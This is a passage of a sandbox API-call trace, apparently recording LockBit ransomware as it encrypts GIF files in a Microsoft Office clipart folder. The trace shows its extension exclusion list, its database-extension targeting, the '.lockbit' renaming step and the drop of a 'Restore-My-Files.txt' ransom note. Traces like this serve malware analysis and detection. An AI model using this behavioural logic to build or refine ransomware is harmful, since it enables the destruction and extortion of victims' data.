-1 [0182.687] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0182.687] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0182.687] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0182.687] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0182.687] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0182.687] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0182.687] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0182.687] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0182.687] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0182.687] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0182.688] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0143743.GIF") returned 1 [0182.688] lstrcmpiW (lpString1="ntldr", lpString2="J0143743.GIF") returned 1 [0182.688] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0143743.GIF") returned 1 [0182.688] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0143743.GIF") returned -1 [0182.688] lstrcmpiW (lpString1="autorun.inf", lpString2="J0143743.GIF") returned -1 [0182.688] lstrcmpiW (lpString1="thumbs.db", lpString2="J0143743.GIF") returned 1 [0182.688] lstrcmpiW (lpString1="iconcache.db", lpString2="J0143743.GIF") returned -1 [0182.688] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0182.688] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143743.GIF") returned=".GIF" [0182.688] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0182.688] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0182.688] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0182.688] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0182.688] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0182.688] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0182.688] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0182.688] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0182.688] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0182.688] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0182.688] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0182.689] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0182.689] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0182.689] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0182.689] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0182.689] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0182.689] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0182.689] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0182.689] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0182.689] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0182.689] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0182.689] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0182.689] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0182.689] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0182.689] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0182.689] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0182.689] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0182.689] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143743.GIF.lockbit") returned 85 [0182.689] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143743.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143743.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0182.690] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0182.690] malloc (_Size=0x40068) returned 0x3df0008 [0182.690] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3959) returned 1 [0182.690] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.691] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0182.691] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.691] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0182.691] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0182.693] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143743.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143743.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0182.693] malloc (_Size=0xc0) returned 0x1fa2ed8 [0182.693] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0182.694] free (_Block=0x1fa2ed8) [0182.694] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143743.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0182.694] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0182.694] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0182.699] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0182.699] malloc (_Size=0x40068) returned 0x3df0008 [0182.700] WriteFile (in: hFile=0x3cc, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0182.701] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4ed3400, ftCreationTime.dwHighDateTime=0x1bd9b11, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4ed3400, ftLastWriteTime.dwHighDateTime=0x1bd9b11, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143744.GIF", cAlternateFileName="")) returned 1 [0182.701] lstrcmpiW (lpString1=".", lpString2="J0143744.GIF") returned -1 [0182.701] lstrcmpiW (lpString1="..", lpString2="J0143744.GIF") returned -1 [0182.701] PathFindExtensionW (pszPath="J0143744.GIF") returned=".GIF" [0182.701] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0182.701] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0182.701] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0182.701] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0182.701] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0182.701] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0182.701] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0182.701] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0182.701] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0182.701] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0182.701] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0182.701] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0182.701] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0182.701] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0182.701] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0182.701] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0182.702] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0182.702] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0182.702] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0182.702] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0182.702] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0182.702] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0182.702] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0143744.GIF") returned 1 [0182.702] lstrcmpiW (lpString1="ntldr", lpString2="J0143744.GIF") returned 1 [0182.702] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0143744.GIF") returned 1 [0182.703] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0143744.GIF") returned -1 [0182.703] lstrcmpiW (lpString1="autorun.inf", lpString2="J0143744.GIF") returned -1 [0182.703] lstrcmpiW (lpString1="thumbs.db", lpString2="J0143744.GIF") returned 1 [0182.703] lstrcmpiW (lpString1="iconcache.db", lpString2="J0143744.GIF") returned -1 [0182.703] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0182.703] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143744.GIF") returned=".GIF" [0182.703] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0182.703] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0182.703] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0182.704] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143744.GIF.lockbit") returned 85 [0182.704] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143744.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143744.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0182.704] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0182.704] malloc (_Size=0x40068) returned 0x3df0008 [0182.704] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=47) returned 1 [0182.704] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.705] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0182.705] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.705] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0182.705] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0182.708] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143744.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143744.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0182.708] malloc (_Size=0xc0) returned 0x1fa2ed8 [0182.708] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0182.709] free (_Block=0x1fa2ed8) [0182.709] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143744.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0182.709] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0182.709] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0182.709] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac144200, ftCreationTime.dwHighDateTime=0x1bd9b11, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xac144200, ftLastWriteTime.dwHighDateTime=0x1bd9b11, nFileSizeHigh=0x0, nFileSizeLow=0x2dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143745.GIF", cAlternateFileName="")) returned 1 [0182.709] lstrcmpiW (lpString1=".", lpString2="J0143745.GIF") returned -1 [0182.709] lstrcmpiW (lpString1="..", lpString2="J0143745.GIF") returned -1 [0182.709] PathFindExtensionW (pszPath="J0143745.GIF") returned=".GIF" [0182.709] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0182.709] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0182.709] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0182.709] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0182.709] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0182.709] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0182.709] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0182.710] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0182.710] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0182.710] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0182.710] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0182.710] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0182.710] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0182.710] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0182.710] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0182.710] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0182.711] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0143745.GIF") returned 1 [0182.711] lstrcmpiW (lpString1="ntldr", lpString2="J0143745.GIF") returned 1 [0182.711] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0143745.GIF") returned 1 [0182.711] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0143745.GIF") returned -1 [0182.711] lstrcmpiW (lpString1="autorun.inf", lpString2="J0143745.GIF") returned -1 [0182.711] lstrcmpiW (lpString1="thumbs.db", lpString2="J0143745.GIF") returned 1 [0182.711] lstrcmpiW (lpString1="iconcache.db", lpString2="J0143745.GIF") returned -1 [0182.711] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0182.711] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143745.GIF") returned=".GIF" [0182.711] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0182.711] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0182.711] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0182.711] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0182.711] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0182.711] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0182.712] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0182.712] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0182.712] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0182.712] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0182.712] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0182.712] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0182.712] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0182.712] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0182.712] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0182.712] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0182.712] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0182.712] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0182.712] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0182.712] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0182.712] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0182.712] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0182.712] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0182.712] lstrcmpiW (lpString1=".sqlite", 